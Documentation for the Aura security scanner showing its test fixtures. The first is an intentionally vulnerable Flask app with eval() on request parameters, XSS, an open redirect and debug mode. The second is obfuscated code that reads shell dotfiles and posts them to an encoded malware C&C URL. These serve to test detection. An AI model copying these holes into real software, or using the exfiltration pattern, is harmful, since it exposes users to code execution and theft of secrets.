Scanner output examples

This is a collection of files from unit tests that demonstrates the Aura scanning capabilities and various output formats.

Vulnerable flask application

# This is an intentionaly vulnerable Flask application
# Vulnerabilites here are used to test the taint analysis sytem

import flask

from . import taint_import

app = flask.Flask("ratata")


class Unsecure():
    def __init__(self):
        self.code = None

    @classmethod
    def eval_arg(cls):
        eval(flask.request.args.get('src', 'pass'))
        return True

    def run(self):
        if self.code is None:
            return False
        else:
            eval(self.code)
            return True


@app.route("/vuln1")
def xss_arg():
    """
    XSS via URL parameter
    """
    data = flask.request.args.get('data')
    resp = flask.make_response(data, 200)
    resp.headers['Content-Type'] = 'text/html'
    return resp


@app.route("/vuln2")
def xss_form():
    """
    XSS via form parameter
    """
    data = flask.request.form['input_data']
    return data


@app.route('/vuln3')
def drive_by():
    """
    Arbitrary redirect via URL parameter
    """
    return flask.redirect(flask.request.args.get('secret_value'), 302)


@app.route('/vuln4')
def vuln4():
    """
    XSS via string concatenation
    """
    return "<h1>" + flask.request.args.get('name', 'John Doe') + '!</h1>'


@app.route('/vuln5')
def vuln5():
    """
    Tainted input defined at the end of the for-loop
    """
    name = None
    for _ in range(5):  # TODO: handle this case
        if name is not None:
            eval(name)
        else:
            name = flask.request.args.get('src', 'pass')


@app.route('/vuln6')
def vuln6():
    obj = Unsecure()
    obj.eval_arg()
    obj.code = flask.request.args.get('src', 'pass')
    obj.run()
    return "Hello world"


@app.route('/vuln7/<command>')
def vuln7(command):
    eval(command)


@app.route('/vuln8')
def vuln8():
    name = flask.request.args.get('name', 'Spiderman')
    return flask.render_template("main_xss.html", name=name)

@app.route('/vuln9')
def vuln9():
    # Test that the taint is passed from a different module
    name = taint_import.get_username()
    return flask.render_template('main_xss.html', name=name)


@app.route('/not_vuln1/<int:command>')
def not_vuln1(command):
    eval(command)


@app.route('/not_vuln2/<command>')
def not_vuln2(command):
    c = int(command)
    eval(c)


@app.route('/test1')
def test1():
    return flask.render_template('doesn_not_exists.html')


app.run(debug=True)

Output

  • plaintext

  • JSON

  • SQLite

  • Parsed AST

Obfuscated code

import pprint as fabulous  # Rename imported module
# Various module import styles
import ab.cd
from a.b.c import d
from x import y as z
from .. import relative

from requests import post  # Import only function from a module
# Simple obfuscation of URL
url = 'aHR0cDovL21hbHd' + 'hcmUuY29tL0NuQw==\n'

blah = open  # Rename builtin function

d = {
    'func': blah
}

somefile = d['func']('~/.profile')

payload = somefile.read()

test_url = "https://example.com/index.html"

with blah('~/.bash_rc') as fd:
    # Local context sensitive
    post(url.decode('base64'), body=fd.read())

# This statement works only in Python 2; can't be parsed in Python 3
print "test"

cpx = 12 + 3j # complex number

fabulous.pprint("adalaraoawa aoalalaeaH"[::-2])  # String "Hello world" after slicing

eval("print('$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!')")